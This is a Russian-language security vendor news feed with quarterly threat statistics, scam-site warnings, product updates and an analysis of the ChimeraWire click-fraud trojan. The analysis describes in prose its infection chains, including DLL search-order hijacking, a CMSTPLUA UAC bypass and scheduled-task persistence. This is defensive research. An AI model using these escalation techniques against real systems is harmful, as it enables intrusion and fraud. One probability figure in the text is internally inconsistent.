Распространение бэкдора Android.Backdoor.Baohuo.1.origin, взламывающего учетные записи Telegram пользователей Android
Появление новых вредоносных приложений в каталоге Google Play

По данным сервиса статистики «Доктор Веб»

Наиболее распространенные угрозы IV квартала 2025 года

Trojan.Siggen31.34463: Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в %appdata%\utorrent\lib.dll. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.
Adware.Downware.20091: Рекламное ПО, выступающее в роли промежуточного установщика пиратских программ.
VBS.KeySender.7: Вредоносный скрипт, который в бесконечном цикле ищет окна с текстом mode extensions, разработчика и розробника и шлет им событие нажатия кнопки Escape, принудительно закрывая их.
Trojan.BPlug.4268: Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.
Adware.Siggen.33379: Поддельный браузерный блокировщик рекламы Adblock Plus, который устанавливается в систему другими вредоносными приложениями с целью показа рекламы.

Статистика вредоносных программ в почтовом трафике

Наиболее распространенные угрозы в почтовом трафике IV квартала 2025 года

W97M.DownLoader.2938: Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.
Trojan.AutoIt.1413: Детектирование упакованной версии троянской программы Trojan.AutoIt.289, написанной на скриптовом языке AutoIt. Она распространяется в составе группы из нескольких вредоносных приложений: майнера, бэкдора и модуля для самостоятельного распространения. Trojan.AutoIt.289 выполняет различные вредоносные действия, затрудняющие обнаружение основной полезной нагрузки.
JS.Phishing.791: Вредоносный сценарий на языке JavaScript, формирующий фишинговую веб-страницу.

Шифровальщики

В IV квартале 2025 года число запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками, увеличилось на 1,15% по сравнению с III кварталом.

Динамика поступления запросов на расшифровку в Службу технической поддержки «Доктор Веб»:

Наиболее распространенные энкодеры IV квартала 2025 года

Trojan.Encoder.35534 — 24,90% обращений пользователей
Trojan.Encoder.41868 — 4,21% обращений пользователей
Trojan.Encoder.29750 — 3,42% обращений пользователей
Trojan.Encoder.26996 — 2,68% обращений пользователей
Trojan.Encoder.30356 — 0,38% обращений пользователей

Сетевое мошенничество

В течение IV квартала 2025 года интернет-аналитики «Доктор Веб» отметили появление новых поддельных сайтов маркетплейсов. Мошенники якобы от имени торговых площадок предлагают потенциальным жертвам сыграть в игру типа «карусель» (аналог рулетки) с шансом получить приз. После нескольких попыток пользователю «везет», но для получения выигрыша от него якобы сначала требуется оплатить доставку, затем страховку, налог и т. д. В некоторых случаях жертве сообщают, что искомый товар отсутствует, и ей предлагают обменять товар на деньги. Однако для их получения необходима оплата «пошлины». Если пользователь соглашается, от него вновь требуют дополнительных платежей в виде страховки, активации некоего счета и т. п.

Пример поддельного сайта маркетплейса, предлагающего «розыгрыш призов»

В базу нерекомендуемых и вредоносных сайтов также были добавлены очередные интернет-ресурсы, на которых мошенники продают несуществующие театральные билеты. На таких сайтах предлагается посетить популярные постановки, в том числе по привлекательным ценам. Однако после оплаты жертвы не получают желаемые билеты и фактически отдают мошенникам деньги.

Один из мошеннических сайтов по продаже несуществующих театральных билетов

Также были обнаружены очередные ресурсы, которые имитируют сайты частных кинотеатров и предлагают приобрести билеты для просмотра фильмов. Никаких билетов после покупки на таких площадках жертвы в итоге не получают.

Поддельный сайт частного кинотеатра

Наши специалисты выявили ряд фишинговых ресурсов, среди которых были поддельные сайты сервиса Steam. С их помощью злоумышленники пытались получить данные учетных записей пользователей, предлагая тем указать логин и пароль для аутентификации.

Фишинговый сайт, который имитирует настоящий интернет-портал Steam и предлагает потенциальной жертве войти в свою учетную запись

Кроме того, мошенники вновь заманивали потенциальных жертв в несуществующие инвестиционные проекты. Один из выявленных сайтов предлагал русскоязычным пользователям в Америке вложить 250$ в проект под названием Federal Invest и «зарабатывать до 90 000 долларов за три месяца». Данный проект якобы был создан в том числе при участии Дональда Трампа.

Мошеннический сайт, предлагающий принять участие в «выгодном инвестиционном проекте»

Другой сайт сообщал о том, что узбекские пользователи имеют возможность получать от 15 00 000 узбекских сум уже в первый месяц после присоединения к рекламируемому проекту, якобы имеющему отношение к крупному холдингу.

Мошеннический сайт, обещающий жителям Узбекистана крупную прибыль от участия в «инвестиционном проекте»

Узнайте больше о нерекомендуемых Dr.Web сайтах

Вредоносное и нежелательное ПО для мобильных устройств

По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в IV квартале 2025 года самыми распространенными Android-угрозами, несмотря на снижение активности, вновь оказались рекламные трояны Android.MobiDash и Android.HiddenAds. На третье место поднялись вредоносные приложения семейства Android.Siggen, которые обладают различной функциональностью. В течение минувших 3 месяцев возросла активность банковских троянов, при этом наибольший рост среди них показали представители семейства Android.Banker.

Наиболее распространенным нежелательным ПО стали программы Program.CloudInject, модифицированные через облачный сервис CloudInject. Среди потенциально опасного ПО наибольшая активность наблюдалась со стороны приложений Tool.NPMod, модифицированных при помощи инструмента NP Manager. Самыми распространенными рекламными программами оказались модули Adware.Adpush, которые разработчики встраивают в Android-программы.

В октябре компания «Доктор Веб» опубликовала сведения об опасном бэкдоре Android.Backdoor.Baohuo.1.origin, внедренном злоумышленниками в модификации мессенджера Telegram X. Вредоносная программа похищает конфиденциальную информацию и позволяет управлять учетной записью жертвы, а также непосредственно контролировать мессенджер, меняя логику его работы.

В течение IV квартала наши вирусные аналитики обнаружили в каталоге Google Play очередные угрозы, среди которых были трояны Android.Joker, которые подписывают пользователей на платные услуги, а также используемые в мошеннических целях вредоносные приложения Android.FakeApp.

Наиболее заметные события, связанные с «мобильной» безопасностью в IV квартале

Рекламные трояны остались самыми распространенными угрозами для Android-устройств
Возросла активность банковских троянов Android.Banker
В сторонних модификациях мессенджера Telegram X был обнаружен опасный бэкдор Android.Backdoor.Baohuo.1.origin
В каталоге Google Play появились новые вредоносные приложения

Более подробно о вирусной обстановке для мобильных устройств в IV квартале 2025 года читайте в нашем обзоре.

«Доктор Веб»: обзор вирусной активности для мобильных устройств в IV квартале 2025 года

Mon, 12 Jan 2026 00:00:00 GMT

12 января 2026 года

Согласно данным статистики детектирований Dr.Web Security Space для мобильных устройств, в IV квартале 2025 года самыми распространенными Android-угрозами вновь стали рекламные трояны Android.MobiDash и Android.HiddenAds, демонстрирующие надоедливые объявления. При этом их активность снизилась: первые обнаруживались на защищаемых устройствах на 43,24% реже, а вторые — на 18,06%. За ними расположились трояны семейства Android.Siggen, которые включают вредоносные приложения, обладающие различной функциональностью. Они также детектировались несколько реже — на 27,47%.

В то же время отмечался заметный рост активности банковских троянов, с которыми пользователи сталкивались чаще на 65,52%. Этот рост произошел в большей степени за счет представителей семейства Android.Banker. Такие вредоносные программы перехватывают СМС с одноразовыми кодами для подтверждения банковских операций, а также могут имитировать внешний вид настоящего банковского ПО и демонстрировать фишинговые окна.

Среди нежелательного ПО наибольшее распространение получили Android-программы, модифицированные через облачный сервис CloudInject (антивирус Dr.Web детектирует их как Program.CloudInject). С его помощью в приложения добавляются опасные системные разрешения и обфусцированный код, функциональность которого невозможно проконтролировать. Кроме того, на устройствах часто встречались поддельные антивирусы Program.FakeAntiVirus, которые обнаруживают несуществующие угрозы и для их «лечения» требуют приобрести полную версию, а также Program.FakeMoney — приложения, якобы позволяющие зарабатывать на выполнении различных заданий.

Самым распространенным потенциально опасным ПО в IV квартале стали приложения Tool.NPMod, модифицированные при помощи утилиты NP Manager. Она обфусцирует код модов и добавляет в них специальный модуль, позволяющий обходить проверку цифровой подписи после модификации приложений. Среди рекламных программ лидерство сохранили представители семейства Adware.Adpush. Это специальные программные модули, которые разработчики встраивают в ПО для демонстрации рекламных уведомлений.

В октябре наши специалисты рассказали об опасном бэкдоре Android.Backdoor.Baohuo.1.origin, который злоумышленники встроили в неофициальные модификации мессенджера Telegram X и распространяли как через вредоносные сайты, так и через сторонние каталоги Android-приложений. Вредоносная программа похищает логины и пароли от учетных записей Telegram, а также другие конфиденциальные данные. Кроме того, с ее помощью киберпреступники фактически способны управлять аккаунтом жертвы и незаметно выполнять в мессенджере различные действия от ее имени. Например — присоединяться к Telegram-каналам и выходить из них, скрывать новые авторизованные устройства, скрывать определенные сообщения и т. д. Android.Backdoor.Baohuo.1.origin управляется в том числе через базу данных Redis, что ранее не встречалось в Android-угрозах. В общей сложности бэкдор заразил порядка 58 000 устройств, среди которых около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и автомобилей с бортовыми компьютерами на базе Android.

За минувший квартал антивирусная лаборатория компании «Доктор Веб» выявила в каталоге Google Play новые вредоносные программы, среди которых были трояны Android.Joker, подписывающие жертв на платные услуги, и различные программы-подделки Android.FakeApp, применяемые в мошеннических схемах. В общей сложности их загрузили по меньшей мере 263 000 раз.

Главные тенденции IV квартала

Рекламные трояны остаются наиболее распространенными Android-угрозами
Рост числа атак банковских троянов
Распространение опасного бэкдора Android.Backdoor.Baohuo.1.origin, встроенного в модификации мессенджера Telegram X
Появление очередных вредоносных приложений в каталоге Google Play

По данным Dr.Web Security Space для мобильных устройств

Android.MobiDash.7859: Троянская программа, показывающая надоедливую рекламу. Она представляет собой программный модуль, который разработчики ПО встраивают в приложения.
Android.FakeApp.1600: Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.
Android.Click.1812: Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.
Android.Packed.57.origin: Детектирование обфускатора, который в том числе используется для защиты вредоносных приложений (например, некоторых версий банковских троянов Android.SpyMax).
Android.Triada.5847: Детектирование упаковщика для троянов семейства Android.Triada, предназначенного для их защиты от анализа и обнаружения. Чаще всего злоумышленники используют его совместно с вредоносными модами мессенджера Telegram, в которые непосредственно встроены эти трояны.

Program.CloudInject.5
Program.CloudInject.1: Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как Tool.CloudInject). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими: блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т. д.
Program.FakeAntiVirus.1: Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.
Program.FakeMoney.11: Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно перевести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.
Program.SnoopPhone.1.origin: Программа для наблюдения за владельцами Android-устройств. Она позволяет читать СМС, получать информацию о телефонных вызовах, отслеживать местоположение устройства и выполнять аудиозапись окружения.

Tool.NPMod.3
Tool.NPMod.1
Tool.NPMod.1.origin: Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. В такие программы внедрен специальный модуль, который позволяет обойти проверку цифровой подписи после их модификации.
Tool.LuckyPatcher.2.origin: Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.
Tool.Androlua.1.origin: Детектирование ряда потенциально опасных версий специализированного фреймворка для разработки Android-программ на скриптовом языке программирования Lua. Основная логика Lua-приложений расположена в соответствующих скриптах, которые зашифрованы и расшифровываются интерпретатором перед выполнением. Часто данный фреймворк по умолчанию запрашивает доступ ко множеству системных разрешений для работы. В результате исполняемые через него Lua-скрипты способны выполнять различные вредоносные действия в соответствии с полученными разрешениями.

Adware.AdPush.3.origin
Adware.Adpush.21846: Рекламные модули, которые могут быть интегрированы в Android-программы. Они демонстрируют рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, эти модули собирают ряд конфиденциальных данных, а также способны загружать другие приложения и инициировать их установку.
Adware.Bastion.1.origin: Детектирование программ-оптимизаторов, которые периодически создают уведомления с вводящими в заблуждение сообщениями о якобы нехватке памяти и ошибках системы с целью показывать рекламу во время «оптимизации».
Adware.Airpush.7.origin: Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.
Adware.ModAd.1: Детектирование некоторых модифицированных версий (модов) мессенджера WhatsApp, в функции которых внедрен код для загрузки заданных ссылок через веб-отображение во время работы с мессенджером. С этих интернет-адресов выполняется перенаправление на рекламируемые сайты, например онлайн-казино и букмекеров, сайты для взрослых.

Угрозы в Google Play

В течение IV квартала 2025 года вирусные аналитики компании «Доктор Веб» зафиксировали появление в каталоге Google Play более двух десятков вредоносных приложений Android.Joker, предназначенных для подписки пользователей на платные услуги. Злоумышленники замаскировали их под различное ПО: мессенджеры, утилиты для оптимизации работы системы, графические редакторы и программы для просмотра фильмов.

Примеры выявленных вредоносных программ Android.Joker. Android.Joker.2496 был замаскирован под инструмент Useful Cleaner для «очистки мусора» на телефоне, а одна из модификаций Android.Joker.2495 — под проигрыватель фильмов Reel Drama

Также наши специалисты обнаружили несколько новых программ-подделок из семейства Android.FakeApp. Как и ранее, некоторые из них распространились под видом финансовых приложений и загружали мошеннические сайты. Другие такие подделки выдавались за игры. При определенных условиях (например, если IP-адрес пользователя удовлетворял требованиям злоумышленников) они могли загружать сайты букмекерских контор и онлайн-казино.

Игра Chicken Road Fun являлась программой-подделкой Android.FakeApp.1910, и вместо того, чтобы предоставить ожидаемую пользователем функциональность, могла загрузить сайт онлайн-казино

Индикаторы компрометации

Обновлено лицензионное соглашение к продукту Dr.Web FixIt!

Mon, 29 Dec 2025 16:02:32 GMT

Мы обновили лицензионное соглашение к продукту Dr.Web FixIt!. С документом можно ознакомиться по ссылке: https://license.drweb.kz/agreement/

Dr.Web FixIt! необходим для детального анализа безопасности рабочих станций и серверов под управлением ОС Windows, и устранения выявленных вирусных угроз и потенциальных уязвимостей. Его ключевое преимущество в том, что он может выявлять новейшее вредоносное ПО и программы, используемые для целевых атак, которые не определяются другими инструментами кибербезопасности.

В первую очередь Dr.Web FixIt! предназначен для специалистов, которые проводят мониторинг безопасности компьютерной инфраструктуры и анализируют киберинциденты. Тем не менее, даже при отсутствии в компании специализированной SOC-команды, решение способно как диагностировать угрозу на рабочей станции и/или сервере, так и произвести лечение после обнаружения.

В случае необходимости специалисты «Доктор Веб» помогут проанализировать информацию, полученную с помощью Dr.Web FixIt!. Для этого необходимо приобрести сертификат на экспертное сопровождение задачи.

Приобрести решение можно у партнеров «Доктор Веб».

Крупное обновление сервера централизованного управления для Dr.Web Enterprise Security Suite и Dr.Web Industrial

Fri, 12 Dec 2025 11:27:10 GMT

Компания «Доктор Веб» выпускает масштабное обновление для сервера в составе Dr.Web Enterprise Security Suite и Dr.Web Industrial 13.0.1.202511120. Оно будет доступно для загрузки с 15 декабря 2025 года. Ключевое изменение — расширение возможностей компонента «Контроль приложений», что поможет существенно усилить защиту пользователей.

В пакет обновлений мы добавили новые возможности и улучшения. В частности, для пользователей линейки продуктов Dr.Web Enterprise Security Suite и Dr.Web Industrial был расширен список критериев функционального анализа:

В категории «Запуск приложений» появились запреты на запуск дочерних процессов офисными программами и почтовыми клиентами. Это снижает риск заражения через вредоносные документы и письма, не мешая обычной работе пользователей.
В категории «Запуск скриптовых интерпретаторов» добавлены новые правила, позволяющие блокировать запуск сценариев из офисных приложений и почтовых клиентов, а также ограничивать выполнение скриптов AutoIt, а также Java и Python. Такие ограничения защищают от злоупотребления интерпретаторами, которые часто используются при кибератаках, а также при выполнении нежелательных автоматизаций.
В категорию «Загрузка драйверов» включен запрет на установку драйверов без WHQL подписи, что помогает предотвратить использование неподписанных модулей и загрузку потенциально опасного кода в ядро системы.

Обновленный набор правил дает администраторам средств защиты более гибкие инструменты для предотвращения вредоносной активности и повышения устойчивости инфраструктуры к современным угрозам.
Также мы избавились от ряда выявленных ранее проблем. Среди них:

исправлена ошибка, которая могла возникнуть при обновлении ПО Сервера Dr.Web под ОС Windows в условиях ограниченных вычислительных ресурсов;
исправлена ошибка, из-за которой при выборе настройки «Обновлять только базы» в разделе Центра управления «Ограничения обновлений» не обновлялся продукт репозитория «Базы контент-фильтров для UNIX»;
исправлена логика обновления кеша ответов DNS-сервера.

Подробный перечень исправлений вы сможете прочитать в этом документе.

Беллерофонту такое и не снилось. Троян ChimeraWire накручивает популярность сайтов, искусно притворяясь человеком

Mon, 08 Dec 2025 09:44:54 GMT

8 декабря 2025 года

Введение

В ходе анализа одной из партнерских программ специалисты компании «Доктор Веб» обнаружили уникальное ВПО с функциональностью кликера, получившее наименование Trojan.ChimeraWire. Оно работает на компьютерах под управлением ОС Windows и основано на проектах с открытым исходным кодом zlsgo и Rod для автоматизированного управления веб-сайтами и веб-приложениями.

Trojan.ChimeraWire позволяет злоумышленникам имитировать действия пользователей и накручивать поведенческий фактор веб-сайтов, искусственно поднимая их рейтинг в выдаче поисковых систем. Для этого вредоносная программа выполняет поиск нужных интернет-ресурсов в системах Google и Bing, после чего открывает их. Она также имитирует действия пользователей, самостоятельно нажимая на ссылки на загруженных сайтах. Троян совершает все вредоносные действия через браузер Google Chrome, который он скачивает с определенного ресурса и запускает в скрытом режиме отладки по протоколу WebSocket.

Trojan.ChimeraWire попадает на компьютеры в результате работы нескольких вредоносных программ-загрузчиков. Они используют различные техники повышения привилегий на основе эксплуатации уязвимостей класса DLL Search Order Hijacking, а также антиотладочные приемы с целью избежать обнаружения. Наша антивирусная лаборатория отследила как минимум 2 цепочки заражения с их участием. В одной из них центральное место занимает вредоносный скрипт Python.Downloader.208, а в другой — вредоносная программа Trojan.DownLoader48.61444, которая по принципу работы схожа с Python.Downloader.208 и фактически выступает его альтернативой.

В данном исследовании мы рассмотрим особенности Trojan.ChimeraWire и вредоносных программ, которые доставляют его на устройства пользователей.

Первая цепочка заражения

Схема, иллюстрирующая первую цепочку заражения

Первая цепочка начинается с трояна Trojan.DownLoader48.54600. Он проверяет, не работает ли в искусственной среде, и завершает работу, если обнаруживает признаки виртуальной машины или режима отладки. Если таких признаков нет, троян скачивает с C2-сервера ZIP-архив python3.zip. В нем находится вредоносный Python-скрипт Python.Downloader.208, а также необходимые для его работы вспомогательные файлы — в частности, вредоносная библиотека ISCSIEXE.dll (Trojan.Starter.8377). Trojan.DownLoader48.54600 распаковывает архив и запускает скрипт. Тот является второй ступенью заражения и представляет собой загрузчик, который скачивает с C2-сервера следующую стадию.

Поведение Python.Downloader.208 зависит от того, какими правами он обладает при запуске. Если скрипт запущен без прав администратора, он пытается их получить. Для этого извлеченный вместе с ним Trojan.Starter.8377 копируется в каталог %LOCALAPPDATA%\Microsoft\WindowsApps. Кроме того, создается скрипт runs.vbs, который в дальнейшем будет использован для повторного запуска Python.Downloader.208.

Далее Python.Downloader.208 запускает системное приложение %SystemRoot%\SysWOW64\iscsicpl.exe. Из-за наличия в нем уязвимости класса DLL Search Order Hijacking оно автоматически загружает троянскую библиотеку ISCSIEXE.dll, имя которой совпадает с именем легитимного компонента ОС Windows.

В свою очередь, Trojan.Starter.8377 запускает VBS-скрипт runs.vbs, и тот повторно исполняет Python.Downloader.208 — уже с правами администратора.

При запуске с необходимыми привилегиями Python.Downloader.208 скачивает с C2-сервера защищенный паролем архив onedrive.zip. В нем находится следующая стадия заражения — вредоносная программа Trojan.DownLoader48.54318 в виде библиотеки с именем UpdateRingSettings.dll — и необходимые для ее работы вспомогательные файлы (например, легитимное приложение OneDrivePatcher.exe из ОС Windows с действительной цифровой подписью, относящееся к ПО OneDrive).

После распаковки архива Python.Downloader.208 создает задачу в системном планировщике на запуск программы OneDrivePatcher.exe при старте системы. Далее он запускает это приложение. Из-за наличия в нем уязвимости DLL Search Order Hijacking оно автоматически загружает вредоносную библиотеку UpdateRingSettings.dll, имя которой совпадает с именем компонента ПО OneDrive.

Получив управление, Trojan.DownLoader48.54318 проверяет, не работает ли он в искусственной среде. При обнаружении одного из признаков работы в виртуальной машине или в режиме отладки он прекращает работу.

Если такие признаки не обнаруживаются, троянская библиотека пытается скачать с C2-сервера полезную нагрузку, а также ключи шифрования для ее расшифровки.

Расшифрованная полезная нагрузка представляет собой ZLIB-контейнер, внутри которого находится шеллкод и исполняемый файл. После расшифровки контейнера Trojan.DownLoader48.54318 пытается распаковать его. Если это не удается, то троян самоудаляется, а сам процесс завершает работу. В случае успеха управление передается шеллкоду, задача которого — разжать идущий вместе с ним исполняемый файл. Данный файл является последней стадией заражения — целевым трояном Trojan.ChimeraWire.

Вторая цепочка заражения

Вторая цепочка начинается с вредоносной программы Trojan.DownLoader48.61444. При запуске она проверяет наличие прав администратора и при их отсутствии пытается их получить. Троян использует технику Masquerade PEB для обхода системы защиты, маскируясь под легитимный процесс explorer.exe.

Затем он вносит патч в копию системной библиотеки %SystemRoot%\System32\ATL.dll. Для этого Trojan.DownLoader48.61444 считывает ее содержимое, добавляет в нее расшифрованный байт-код и путь до своего файла, после чего сохраняет модифицированную версию в виде файла dropper в той же директории, где он расположен. Далее троян инициализирует объекты COM-модели оболочки Windows для сервиса %SystemRoot%\System32\wbem и измененной библиотеки. Если инициализация проходит успешно, Trojan.DownLoader48.61444 пытается получить права администратора через использование COM-интерфейса CMSTPLUA, эксплуатируя уязвимость, характерную для некоторых старых COM-интерфейсов.

В случае успеха модифицированная библиотека dropper копируется в каталог %SystemRoot%\System32\wbem в виде файла ATL.dll. После этого Trojan.DownLoader48.61444 запускает системную оснастку управления WMI WmiMgmt.msc. В результате происходит эксплуатация уязвимости DLL Search Order Hijacking в системном приложении mmc.exe, которое автоматически загружает библиотеку %SystemRoot%\System32\wbem\ATL.dll с патчем. Она, в свою очередь, повторно запускает Trojan.DownLoader48.61444, но уже с правами администратора.

Схема работы Trojan.DownLoader48.61444 при отсутствии прав администратора

При запуске от имени администратора Trojan.DownLoader48.61444 исполняет несколько PowerShell-скриптов для скачивания полезной нагрузки с C2-сервера. Одним из загружаемых объектов является ZIP-архив one.zip. В нем находятся файлы, аналогичные файлам из архива onedrive.zip из первой цепочки (в частности, легитимная программа OneDrivePatcher.exe и вредоносная библиотека UpdateRingSettings.dll — Trojan.DownLoader48.54318).

Trojan.DownLoader48.61444 распаковывает архив и в системном планировщике создает задачу на автозапуск OneDrivePatcher.exe при загрузке системы. Троян также непосредственно запускает это приложение. Так же, как и в первой цепочке, при запуске в OneDrivePatcher.exe происходит эксплуатация уязвимости DLL Search Order Hijacking и автоматическая загрузка троянской библиотеки UpdateRingSettings.dll. Далее цепочка заражения повторяет первый сценарий.

При этом Trojan.DownLoader48.61444 скачивает и второй ZIP-архив: two.zip. В нем находится вредоносный скрипт Python.Downloader.208 (update.py), а также файлы, необходимые для его запуска. Среди них — Guardian.exe — переименованный консольный интерпретатор языка Python pythonw.exe.

После распаковки архива Trojan.DownLoader48.61444 создает в системном планировщике задачу на автозапуск Guardian.exe при загрузке системы. Кроме того, он непосредственно исполняет через это приложение вредоносный скрипт Python.Downloader.208.

Частично дублируя первую цепочку заражения, злоумышленники, по всей видимости, стремились повысить вероятность успешной загрузки Trojan.ChimeraWire в целевые системы.

Схема работы Trojan.DownLoader48.61444 с правами администратора

Trojan.ChimeraWire

Trojan.ChimeraWire получил свое имя на основе сочетания слов «chimera» (в переводе с англ. «химера» — мифическое существо с частями тел нескольких животных) и «wire» (в переводе с англ. «провод»). Слово «chimera» описывает гибридную природу применяемых злоумышленниками методик: использование троянов-загрузчиков, написанных на разных языках, а также антиотладочные техники и эскалация привилегий в процессе заражения. Кроме того, оно отражает то, что троян представляет собой комбинацию различных фреймворков, плагинов и легального ПО, через которое осуществляется скрытое управление трафиком. Отсюда вытекает второе слово «wire»: оно отсылает к невидимой и вредоносной работе трояна с сетью.

Попадая на целевой компьютер, Trojan.ChimeraWire скачивает со стороннего сайта ZIP-архив chrome-win.zip с браузером Google Chrome для ОС Windows. Отметим, что на этом ресурсе также хранятся архивы со сборками Google Chrome и для других систем, таких как Linux и macOS — в том числе для различных аппаратных платформ.

Сайт с различными сборками браузера Google Chrome, откуда троян загружает необходимый архив

После скачивания браузера Trojan.ChimeraWire пытается незаметно установить в него расширения NopeCHA и Buster, предназначенные для автоматизированного распознавания капчи (CAPTCHA). Данные расширения будут в дальнейшем использоваться трояном в процессе его работы.

Далее он запускает браузер в режиме отладки без видимого окна, что позволяет выполнять вредоносную деятельность, не привлекая внимания пользователя. После этого происходит подключение к выбранному автоматически порту отладки по протоколу WebSocket.

Вслед за этим троян переходит к получению заданий. Он отправляет запрос на C2-сервер и получает в ответ base64-строку, в которой скрыта зашифрованная алгоритмом AES-GCM конфигурация в формате JSON.

Пример конфигурации, которую трояну передает C2-сервер

В ней находятся задания и связанные с ними параметры:

целевая поисковая система (поддерживаются системы Google и Bing);
ключевые фразы для поиска сайтов в заданной поисковой системе и их последующего открытия;
максимальное количество последовательных переходов по веб-страницам;
случайные распределения для выполнения автоматических кликов на веб-страницах;
время ожидания загрузки страниц;
целевые домены.

Для дополнительной имитации деятельности реального человека и обхода систем, отслеживающих постоянную активность, в конфигурации также предусмотрены параметры, отвечающие за паузы между сессиями работы.

Имитация кликов мышью пользователем

Trojan.ChimeraWire способен выполнять клики следующих видов:

для навигации по поисковой выдаче;
для открытия найденных релевантных ссылок в новых фоновых вкладках.

Вначале Trojan.ChimeraWire через нужную поисковую систему выполняет поиск сайтов по доменам и ключевым фразам, указанным в конфигурации. Далее он открывает полученные в поисковой выдаче сайты и находит на них все HTML-элементы, которые определяют гиперссылки. Троян помещает их в массив данных и перемешивает его, чтобы объекты в нем располагались в последовательности, отличной от последовательности на веб-странице. Это делается для обхода антибот-защиты сайтов, которая может отслеживать порядок нажатий.

Затем Trojan.ChimeraWire проверяет, работоспособны ли найденные ссылки и совпадают ли строки в них с заданным шаблоном из конфигурации, после чего подсчитывает общее количество совпадений. Дальнейшие действия трояна зависят от получившегося числа.

Если на странице было выявлено достаточное количество подходящих ссылок, Trojan.ChimeraWire сканирует страницу и сортирует найденные ссылки по релевантности (наиболее соответствующие ключевым словам ссылки идут первыми). После этого выполняется клик по одной или нескольким подходящим ссылкам.

Если же совпадений с заданным шаблоном недостаточно или их нет вовсе, вредоносная программа использует алгоритм с вероятностной моделью поведения, который максимально имитирует действия настоящего пользователя. На основе параметров из конфигурации при помощи взвешенного случайного распределения Trojan.ChimeraWire определяет количество ссылок, по которым необходимо перейти. Например, распределение ["1:90", "2:10"] означает, что Trojan.ChimeraWire кликнет 1 ссылку с вероятностью 90%, и 2 ссылки — с вероятностью 20%. Таким образом, с большой долей вероятности вредоносная программа должна перейти по одной ссылке. Троян случайным образом выбирает ссылку из составленного ранее массива и выполняет клик.

После каждого перехода по ссылке из поисковой выдачи и выполнения кликов на загружаемой странице троян, в зависимости от задачи, возвращается на предыдущую вкладку или переходит к следующей. Алгоритм действий повторяется до тех пор, пока не будет исчерпан лимит по кликам для целевых веб-сайтов.

Ниже представлены примеры сайтов, параметры для взаимодействия с которыми поступали трояну в заданиях от C2-сервера:

Подробные технические описания трояна ChimeraWire и вредоносных программ, участвующих в его загрузке, находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Подробнее о Trojan.ChimeraWire
Подробнее о Trojan.DownLoader48.54600
Подробнее о Trojan.Starter.8377
Подробнее о Python.Downloader.208
Подробнее о Trojan.DownLoader48.54318
Подробнее о Trojan.DownLoader48.61444

Заключение

В настоящее время вредоносная деятельность Trojan.ChimeraWire фактически сводится к выполнению относительно простых задач кликера по накрутке популярности веб-сайтов. Вместе с тем, функциональные возможности лежащих в его основе утилит позволяют трояну решать более широкий спектр задач — в том числе совершать автоматизированные действия под видом активности настоящих пользователей. Так, с его помощью злоумышленники могут заполнять веб-формы — например, на сайтах, проводящих опросы в рекламных целях. Кроме того, они могут использовать его для считывания содержимого веб-страниц и создания их скриншотов — как с целью кибершпионажа, так и для автоматического сбора информации для наполнения различных баз данных (например, с почтовыми адресами, номерами телефонов и т. п.).

Таким образом, в будущем возможно появление новых версий Trojan.ChimeraWire, где эти и другие функции будут реализованы в полной мере. Специалисты компании «Доктор Веб» продолжают следить за развитием этого трояна.

MITRE ATT&CK®

Этап	Техника
Выполнение	Выполнение с участием пользователя (T1204) Вредоносный файл (T1204.002) Вредоносная библиотека (T1204.005) PowerShell (T1059.001) Командная оболочка Windows (T1059.003) Visual Basic (T1059.005) Python (T1059.006) Планировщик заданий Windows (T1053.005)
Закрепление	Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001) Запланированная задача / задание (T1053)
Повышение привилегий	Перехват потока исполнения: перехват поиска DLL (T1574.001) Обход контроля учетных записей (T1548.002)
